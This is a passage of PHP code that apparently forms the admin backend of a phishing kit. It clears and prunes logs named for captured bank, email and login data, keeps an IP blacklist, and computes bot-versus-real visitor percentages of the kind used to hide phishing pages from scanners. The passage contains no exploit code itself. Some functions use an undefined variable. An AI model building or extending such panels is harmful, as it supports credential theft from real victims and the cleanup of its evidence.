        $blacklist_content = file($blacklist_filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
        // Trim each line to remove leading/trailing spaces and filter the array
        $blacklist_content = array_filter(array_map('trim', $blacklist_content));
    
        // Find and remove the line containing the IP to be deleted
        $updated_content = array_filter($blacklist_content, function($line) use ($ip_to_delete) {
            return strpos($line, $ip_to_delete . '|') !== 0;
        });
    
        // Save the updated list back to the file
        file_put_contents($blacklist_filename, implode(PHP_EOL, $updated_content));

        $log_entry = "\r\n";
        file_put_contents('../log/usersinfo.log', $log_entry , FILE_APPEND);
    
        // Redirect to the same page to avoid form resubmission
        $_SESSION['cleanlog'] = 'success';
        header("Location: ?success");
        exit;
    }    

    public function deleteEmailEntry() {
        $log_filename = "../log/markemail.log";
        $email_to_delete = $_POST['delete_email'];
    
        // Check if the file exists
        if (!file_exists($log_filename)) {
            error_log("The log file does not exist: $log_filename");
            return;
        }
    
        // Read the log file into an array
        $log_content = file($log_filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
        // Find and remove the line containing the email to be deleted
        $updated_content = array_filter($log_content, function($line) use ($email_to_delete) {
            return strpos($line, $email_to_delete . '|') !== 0;
        });
    
        // Save the updated list back to the file
        if (file_put_contents($log_filename, implode(PHP_EOL, $updated_content) . PHP_EOL) === false) {
            error_log("Failed to write updated content to $log_filename");
        }
    
        // Redirect to the same page to avoid form resubmission
        $_SESSION['cleanlog'] = 'success';
        header("Location: ?success");
        exit;
    }    
    

    public function deleteBlacklist(){
        $blacklist_filename = "../log/blacklist.log";
        $ip_to_delete = $_POST['delete_ip'];

        // Read the blacklist file into an array
        $blacklist_content = file($blacklist_filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

        // Trim each line to remove leading/trailing spaces and filter the array
        $blacklist_content = array_filter(array_map('trim', $blacklist_content));

        // Remove the IP to be deleted
        $blacklist_content = array_diff($blacklist_content, [$ip_to_delete]);

        // Save the updated list back to the file
        file_put_contents($blacklist_filename, implode(PHP_EOL, $blacklist_content));

        // Redirect to the same page to avoid form resubmission
        $_SESSION['cleanlog'] = 'success';
        header("Location: ./blacklist");
        exit;
    }

    public function Visitors(){
        // Path to the log file
        $log_file = '../log/view.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;
    }

    public function VisitRobot(){
        // Path to the log file
        $log_file = '../log/robot.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;
    }

    public function RobotPercentage(){
        $visitors = $this->Visitors();
        if ($visitors == 0) {
            $percentage = 0;
        } else {
            $percentage = ($this->VisitRobot() / $visitors) * 100;
        }
        $showpercent = number_format($percentage, 2);
        return $showpercent;
    }

    public function VisitReal(){
        // Path to the log file
        $log_file = '../log/real.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;

    }

    public function VisitBlacklist(){
        // Path to the log file
        $log_file = '../log/blackvisit.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;

    }

    public function VisitBlocked(){
        // Path to the log file
        $log_file = '../log/blocked.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;
    }

    public function LogLogin(){
        // Path to the log file
        $log_file = '../log/login.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;
    }

    public function LoginPercentage(){
        if ($this->LogLogin() == 0) {
            $percentage = 0;
        } else {
            $percentage = ($this->LogLogin() / $this->VisitReal()) * 100;
        }
        $showpercent = number_format($percentage, 2);

        return $showpercent;
    }

    public function BlockedPercentage(){
        if ($this->VisitBlocked() == 0) {
            $percentage = 0;
        } else {
            $percentage = ($this->VisitBlocked() / $this->Visitors()) * 100;
        }
        $showpercent = number_format($percentage, 2);
        return $showpercent;
    }

    public function BlacklistPercentage(){
        $visitors = $this->Visitors();
        if ($visitors == 0) {
            $percentage = 0;
        } else {
            $percentage = ($this->VisitBlacklist() / $visitors) * 100;
        }
        $showpercent = number_format($percentage, 2);
        return $showpercent;
    }

    public function RealPercentage(){
        if ($this->VisitReal() == 0) {
            $percentage = 0;
        } else {
            $percentage = ($this->VisitReal() / $this->Visitors()) * 100;
        }
        $showpercent = number_format($percentage, 2);
        return $showpercent;

    }

    public function CleanAllUsers(){
        $log_file = '../log/usersinfo.log';
        if (file_put_contents($log_file, '') === false) {
            $all_cleared = false;
        }
        if ($all_cleared) {
            $_SESSION['cleanlog'] = 'success';
        } else {
            $_SESSION['cleanlog'] = 'failed';
        }

        header("Location: ?Success");
        exit;
    }

    public function CleanAllListmark(){
        $log_file = '../log/markemail.log';
        if (file_put_contents($log_file, '') === false) {
            $all_cleared = false;
        }
        if ($all_cleared) {
            $_SESSION['cleanlog'] = 'success';
        } else {
            $_SESSION['cleanlog'] = 'failed';
        }

        header("Location: ?Success");
        exit;
    }

    public function CleanAllLogs() {
        $log_files = [
            '../log/bank.log',
            '../log/email.log',
            '../log/login.log',
            '../log/view.log',
            '../log/real.log',
            '../log/robot.log',
            '../log/blackvisit.log',
            '../log/blocked.log',
        ];
        
        $all_cleared = true;
        foreach ($log_files as $log_file) {
            if (file_put_contents($log_file, '') === false) {
                $all_cleared = false;
            }
        }

        if ($all_cleared) {
            $_SESSION['cleanlog'] = 'success';
        } else {
            $_SESSION['cleanlog'] = 'failed';
        }

        header("Location: ?Success");
        exit;
    }
}
?>